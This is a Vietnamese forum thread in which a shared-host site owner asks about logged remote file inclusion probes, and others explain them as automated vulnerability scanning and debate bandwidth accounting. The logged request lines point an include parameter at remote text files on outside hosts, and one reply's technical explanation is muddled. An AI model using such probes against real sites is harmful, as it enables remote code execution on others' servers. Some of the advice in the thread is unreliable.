Latest posts for the topic "Đang trong tầm ngắm của bọn phá hoại, nhờ các bác xem Shared host PHP"

Đang trong tầm ngắm của bọn phá hoại, nhờ các bác xem Shared host PHP

superthin — GMT

Tình hình là hôm nay vào DirectAdmin để xem nguyên nhân vì sao mà ảnh nền trang web không thể nạp lên được dù HTML đúng path, test thử trên localhost và host khác OK. Mới phát hiện ra rằng có hai dòng rất khả nghi: Code:

tên miền/include_once.php?include_file=http://www.moppedtreffen.de/icon/id.txt??

và Code:

http://69amigas.com/chat/chat/localization/spanish/echo.txt???

Nhìn địa chỉ IP truy cập thì thấy hai câu trên đều xuất phát từ một địa chỉ IP ở nước ngoài. Nhờ các bạn khảo sát giúp xem hai cái câu lệnh kia thể hiện người ta định bày trò gì? Liệu có nguy hiểm đến trang web của mình? Để cho chắc ăn, trên host mình hiện giờ không có file include_once.php bằng PHP script nhưng mình upload lên 1 file có dung lượng 400MB và là file phim .avi đổi tên thành include_once.php để cho hacker nghịch cho vui :) Chân thành cám ơn!

Re: Đang trong tầm ngắm của bọn phá hoại, nhờ các bác xem Shared host PHP

conmale — GMT

Bồ tham khảo cái txt file được include trên request chưa? Làm "trò" gì thì nằm trong cái txt file đó và bồ đã nhận định "include" là chìa khóa. Cái gì chớ "shared host" thì quên đi chuyện bảo mật.

Re: Đang trong tầm ngắm của bọn phá hoại, nhờ các bác xem Shared host PHP

jforum3000 — GMT

conmale wrote:

Cái gì chớ "shared host" thì quên đi chuyện bảo mật.

Vậy là đành phó mặc số phận cho các admin server sao anh?

Re: Đang trong tầm ngắm của bọn phá hoại, nhờ các bác xem Shared host

superthin — GMT

Ùi, conmale ơi, mình chả biết quái quỉ gì về bảo mật đâu, không biết tí nào. Cài đặt một diễn đàn viết bằng PHP dạng dễ như punBB mà còn thất bại nữa là. Chẳng qua là thằng bạn nó có một shared host có sẵn cái diễn đàn mà ngày trước nó được ai đó tặng không có thời gian rảnh nên tặng lại, và chủ yếu là vào viết bài thôi. Cho nên bác bảo đọc cái file txt kia thì :^) chịu, chỉ hiểu rằng dường như nó là một thứ ngôn ngữ lập trình, còn nó là ngôn ngữ gì, có ý định làm gì thì... bó tay cả. Làm ơn phân tích và báo cáo giúp xem vấn đề là người ta đã âm thầm kiểm soát toàn bộ trang web của mình hay chưa? Xin cám ơn!

Re: Đang trong tầm ngắm của bọn phá hoại, nhờ các bác xem Shared host PHP

nbthanh — GMT

Cả http://www.moppedtreffen.de/icon/id.txt và http://69amigas.com/chat/chat/localization/spanish/echo.txt có nội dung như nhau. Xem kỹ hơn thì đoạn code trong 2 file này đơn thuần chỉ là print 1 số thông tin của hệ thống, không có gì gọi là "phá hoại" cả. Trong 2 file thấy 1 cái tên: Osirys --> Google phát liền :D Dựa vào 1 số thông tin thu thập được thì tạm thời kết luận thế này: - Có 1 anh chàng tên là Osirys. - Anh chàng này viết ra 1 số script scan website xem thử nó có lỗi gì không, cụ thể ở đây là lỗi remote include của 1 số script PHP. - Có ai đó đang dùng cái script của anh chàng này để "test" cái host của bạn. Vậy thôi! Và mình upload lên 1 file có dung lượng 400MB và là file phim .avi đổi tên thành include_once.php để cho hacker nghịch cho vui ==> đừng nghịch dại thế! Có up file gì thì up file cỡ 4...byte thôi. Bạn có biết là nếu cấu hình không tốt, mỗi lần có request tới là host của bạn mất 400Mb bandwidth rồi không? Mặc dù chưa có hại gì đến dữ liệu, nhưng nó scan liên tục, nếu nhanh thì 1 tiếng nó request cỡ...1000 lần thì bạn tự tính đi cái host của bạn bao lâu sau sẽ hết bandwidth của tháng đó?

Re: Đang trong tầm ngắm của bọn phá hoại, nhờ các bác xem Shared host PHP

PXMMRF — GMT

Cũng như bác Thành (nbthanh) đã viết, ai đó (0sirys?) gửi môt HTTP command "GET" đến cổng 80 của webserver đang hosting website của bạn. Kèm theo GET command là một code: include_once(), cụ thể ở đây là include_once.php. Rồi GET command nói trên reference (tham chiếu - nói đơn giản là đưa vào lệnh GET) một PHP script , nằm ở trang web có địa chỉ là: http://www.moppedtreffen.de/icon/id.txt (Bạn access vào mà xem) Script này sẽ execute (thưc thi ) nhằm cố gắng lấy ra môt số file PHP trong webserver của bạn, cho hiện ra và in ra ở máy hacker. Webserver hosting website của bạn chạy Windows và cài PHP 5 phải không? À nếu muốn cho "nó" load file PHP về máy nó thì bạn phải đăt file ở chỗ này chứ , thí dụ C:/Program Files/"PHP file" (khi webserver chay Windows). File thì nhỏ thôi, như bác Thành đã nói, nôi dụng chửi tục môt chút là "đạt" rồi. (Mà chắc phải chửi bằng tiếng Anh đấy). Hì hì

Xin hỏi thêm chút xíu

superthin — GMT

PXMMRF wrote:

Webserver hosting website của bạn chạy Windows và cài PHP 5 phải không? À nếu muốn cho "nó" load file PHP về máy nó thì bạn phải đăt file ở chỗ này chứ , thí dụ C:/Program Files/"PHP file" (khi webserver chay Windows).

Có lẽ không phải host chạy Windows, mình cũng chả rành khoản này đâu, nhưng không cho rằng host chạy với Windows, PHP5 thì đúng, nhưng LINUX hay BSD gì ấy vì khi upload vài file lên thì nó phân biệt tên file chữ thường và CHỮ HOA => có lẽ không phải Windows. Xin hỏi thêm, là nếu thằng kẻ khai thác thông tin kia lấy thông tin thì nó sẽ lấy được thông tin gì của mình? Liệu nó có lấy được mật khẩu hoặc cái gì ấy mà đủ thông tin để lợi dụng thông tin có được ấy gây hại cho trang web?

Xin hỏi thêm chút xíu

nbthanh — GMT

superthin wrote:

Xin hỏi thêm, là nếu thằng kẻ khai thác thông tin kia lấy thông tin thì nó sẽ lấy được thông tin gì của mình? Liệu nó có lấy được mật khẩu hoặc cái gì ấy mà đủ thông tin để lợi dụng thông tin có được ấy gây hại cho trang web?

Có lẽ bạn chưa nắm được vấn đề: như tôi và bác PXMMRF trả lời thì có "ai đó" đang thử xem site của bạn có bị lỗi hay không? Hoàn toàn không có thông tin nào (vào thời điểm hiện tại) chứng tỏ rằng "ai đó" đã lấy được thông tin của bạn, cũng chưa có chứng cứ nào cho biét là site hay host của bạn có lỗi. Như vậy thì hiện tại không thể trả lời được là "ai đó" có thể lợi dụng được gì trên site của bạn.

Re: Đang trong tầm ngắm của bọn phá hoại, nhờ các bác xem Shared host PHP

ken_shin — GMT

đừng nghịch dại thế![/B] Có up file gì thì up file cỡ 4...byte thôi. Bạn có biết là nếu cấu hình không tốt, mỗi lần có request tới là host của bạn mất 400Mb bandwidth rồi không? Mặc dù chưa có hại gì đến dữ liệu, nhưng nó scan liên tục, nếu nhanh thì 1 tiếng nó request cỡ...1000 lần thì bạn tự tính đi cái host của bạn bao lâu sau sẽ hết bandwidth của tháng đó?

mình chưa hiểu cho này nó phải tải toàn bộ file đó thì mình mới mất 400mb băng thông chứ nếu nó chỉ request rùi tắt luôn thì sao mà mình mất tới 400mb 1 lần dc.mình từng bị người ta tải 1 file zip năng 8mb 1 ngày mà nó tải dc 25gb băng thông từ file này luôn bái phục.(1 ip duy nhất)

Re: Đang trong tầm ngắm của bọn phá hoại, nhờ các bác xem Shared host

nlfb — GMT

ken_shin wrote:

đừng nghịch dại thế![/B] Có up file gì thì up file cỡ 4...byte thôi. Bạn có biết là nếu cấu hình không tốt, mỗi lần có request tới là host của bạn mất 400Mb bandwidth rồi không? Mặc dù chưa có hại gì đến dữ liệu, nhưng nó scan liên tục, nếu nhanh thì 1 tiếng nó request cỡ...1000 lần thì bạn tự tính đi cái host của bạn bao lâu sau sẽ hết bandwidth của tháng đó?
mình chưa hiểu cho này nó phải tải toàn bộ file đó thì mình mới mất 400mb băng thông chứ nếu nó chỉ request rùi tắt luôn thì sao mà mình mất tới 400mb 1 lần dc.mình từng bị người ta tải 1 file zip năng 8mb 1 ngày mà nó tải dc 25gb băng thông từ file này luôn bái phục.(1 ip duy nhất)

Script này thường làm tự động chứ thường không ai ngồi canh thấy request đến 400MB thì tắt đâu bạn, và còn đường truyền nữa chứ, 25GB băng thông tại VN thì thấy to như bánh xe bò chứ thử đưa anh conmale xem ảnh tải mất bao lâu ;-)

Re: Đang trong tầm ngắm của bọn phá hoại, nhờ các bác xem Shared host

nbthanh — GMT

ken_shin wrote:

đừng nghịch dại thế![/B] Có up file gì thì up file cỡ 4...byte thôi. Bạn có biết là nếu cấu hình không tốt, mỗi lần có request tới là host của bạn mất 400Mb bandwidth rồi không? Mặc dù chưa có hại gì đến dữ liệu, nhưng nó scan liên tục, nếu nhanh thì 1 tiếng nó request cỡ...1000 lần thì bạn tự tính đi cái host của bạn bao lâu sau sẽ hết bandwidth của tháng đó?
mình chưa hiểu cho này nó phải tải toàn bộ file đó thì mình mới mất 400mb băng thông chứ nếu nó chỉ request rùi tắt luôn thì sao mà mình mất tới 400mb 1 lần dc.mình từng bị người ta tải 1 file zip năng 8mb 1 ngày mà nó tải dc 25gb băng thông từ file này luôn bái phục.(1 ip duy nhất)

Tôi đã nói là tùy cấu hình của server nữa mà, nhưng thường thì không cần client phải download hết file thì server mới tính là mình hết 400Mb băng thông đâu. Từ client tới host còn phải đi qua cả chục host/máy trung gian nữa. Do vậy băng thông tính ngay lúc có response từ server chứ làm sao mà tính lúc data đi tới client được. Do vậy nếu client nó cứ request và từ chối không nhận response thì có thể server mất hết dần băng thông mà client vẫn không hề hấn gì.

Re: Đang trong tầm ngắm của bọn phá hoại, nhờ các bác xem Shared host

ken_shin — GMT

nbthanh wrote:

ken_shin wrote:

đừng nghịch dại thế![/B] Có up file gì thì up file cỡ 4...byte thôi. Bạn có biết là nếu cấu hình không tốt, mỗi lần có request tới là host của bạn mất 400Mb bandwidth rồi không? Mặc dù chưa có hại gì đến dữ liệu, nhưng nó scan liên tục, nếu nhanh thì 1 tiếng nó request cỡ...1000 lần thì bạn tự tính đi cái host của bạn bao lâu sau sẽ hết bandwidth của tháng đó?
mình chưa hiểu cho này nó phải tải toàn bộ file đó thì mình mới mất 400mb băng thông chứ nếu nó chỉ request rùi tắt luôn thì sao mà mình mất tới 400mb 1 lần dc.mình từng bị người ta tải 1 file zip năng 8mb 1 ngày mà nó tải dc 25gb băng thông từ file này luôn bái phục.(1 ip duy nhất)
Tôi đã nói là tùy cấu hình của server nữa mà, nhưng thường thì không cần client phải download hết file thì server mới tính là mình hết 400Mb băng thông đâu. Từ client tới host còn phải đi qua cả chục host/máy trung gian nữa. Do vậy băng thông tính ngay lúc có response từ server chứ làm sao mà tính lúc data đi tới client được. Do vậy nếu client nó cứ request và từ chối không nhận response thì có thể server mất hết dần băng thông mà client vẫn không hề hấn gì.

thank cái này mới trước giờ không biết.hình như hơi hiểu rùi. nhưng nghĩ lại thì nếu sever bắt đầu response là tính băng thông . dù client nó cứ request và từ chối không nhận response thì sever vẫn mất băng thông trên đường đi (mình ở vn chơi đứa nào bên us chắc hiệu quả lém vì đường xa) nhưng với 1 file 400mb thì làm sao hao hết trên đường đi được mình nghĩ cùng lắm là vài mb (chắc không tới đâu).nếu cứ mỗi request mà mất 400mb thì hóa ra bên quản lý host họ ăn gian băng thông của khách hàng rùi.

Re: Đang trong tầm ngắm của bọn phá hoại, nhờ các bác xem Shared host

nbthanh — GMT

ken_shin wrote:

thank cái này mới trước giờ không biết.hình như hơi hiểu rùi. nhưng nghĩ lại thì nếu sever bắt đầu response là tính băng thông . dù client nó cứ request và từ chối không nhận response thì sever vẫn mất băng thông trên đường đi (mình ở vn chơi đứa nào bên us chắc hiệu quả lém vì đường xa) nhưng với 1 file 400mb thì làm sao hao hết trên đường đi được mình nghĩ cùng lắm là vài mb (chắc không tới đâu).nếu cứ mỗi request mà mất 400mb thì hóa ra bên quản lý host họ ăn gian băng thông của khách hàng rùi.

Bạn download file trên internet bạn có để ý thấy là file chưa load xong nhưng ở client biết được dung lượng file là bao nhiêu để tính giờ download? Lý do là vì trong phần header của response từ server nó có thông tin file size. Như vậy, nếu host dựa vào thông số này để tính băng thông thì thế nào? Host nó phải tính cái nào có lợi cho nó chứ. Còn chuyện client request nhưng chỉ đọc xong header rồi ngắt thì...bạn ráng chịu à ;-)

Re: Đang trong tầm ngắm của bọn phá hoại, nhờ các bác xem Shared host PHP

ken_shin — GMT

nói vậy thì chỉ có nước chạy ra cho mấy đứa bán host chửi nó 1 trân cho bõ tức ( không biết có chửi lại nó ko hay bị nó chgửi) thiệt tình làm ăn gì mà gian lân không hà.đúng là dan vn .

Re: Đang trong tầm ngắm của bọn phá hoại, nhờ các bác xem Shared host

nbthanh — GMT

ken_shin wrote:

nói vậy thì chỉ có nước chạy ra cho mấy đứa bán host chửi nó 1 trân cho bõ tức ( không biết có chửi lại nó ko hay bị nó chgửi) thiệt tình làm ăn gì mà gian lân không hà.đúng là dan vn .

Host nào chả vậy chứ riêng gì VN hay nước ngoài. Mà host VN thì chương trình quản lý băng thông cũng là của nước ngoài mà :D Cách tính dựa trên response từ header là tương đối chính xác nhanh và đỡ mất công tính toán nhất. Với lại trong đa số trường hợp, 1 file HTML hay GIF vài chục Kb trở lại thì client chưa kịp "ngắt" là toàn bộ nội dung file đã bay ra khỏi server rồi. Còn nếu bạn host file tới 400Mb mà bị "rút ruột" kiểu này thì ráng chịu vậy, thiểu số phải theo đa số chứ :-)

Re: Đang trong tầm ngắm của bọn phá hoại, nhờ các bác xem Shared host

seraphpl — GMT

nbthanh wrote:

ken_shin wrote:

đừng nghịch dại thế![/B] Có up file gì thì up file cỡ 4...byte thôi. Bạn có biết là nếu cấu hình không tốt, mỗi lần có request tới là host của bạn mất 400Mb bandwidth rồi không? Mặc dù chưa có hại gì đến dữ liệu, nhưng nó scan liên tục, nếu nhanh thì 1 tiếng nó request cỡ...1000 lần thì bạn tự tính đi cái host của bạn bao lâu sau sẽ hết bandwidth của tháng đó?
mình chưa hiểu cho này nó phải tải toàn bộ file đó thì mình mới mất 400mb băng thông chứ nếu nó chỉ request rùi tắt luôn thì sao mà mình mất tới 400mb 1 lần dc.mình từng bị người ta tải 1 file zip năng 8mb 1 ngày mà nó tải dc 25gb băng thông từ file này luôn bái phục.(1 ip duy nhất)
Tôi đã nói là tùy cấu hình của server nữa mà, nhưng thường thì không cần client phải download hết file thì server mới tính là mình hết 400Mb băng thông đâu. Từ client tới host còn phải đi qua cả chục host/máy trung gian nữa. Do vậy băng thông tính ngay lúc có response từ server chứ làm sao mà tính lúc data đi tới client được. Do vậy nếu client nó cứ request và từ chối không nhận response thì có thể server mất hết dần băng thông mà client vẫn không hề hấn gì.

cho em hỏi là: nếu như vậy thì nhà cung cấp dịch vụ internet(fpt,vnn,viettel,...) cũng áp dụng cách này để tính dung lượng dữ liệu hàng tháng của mỗi thuê bao?

Re: Đang trong tầm ngắm của bọn phá hoại, nhờ các bác xem Shared host

nbthanh — GMT

ISP thì có thể họ tính dung lượng cách khác, vì bạn đâu có download trực tiếp từ host của bạn, mà bạn vào internet (download/upload từ site khác) thông qua họ.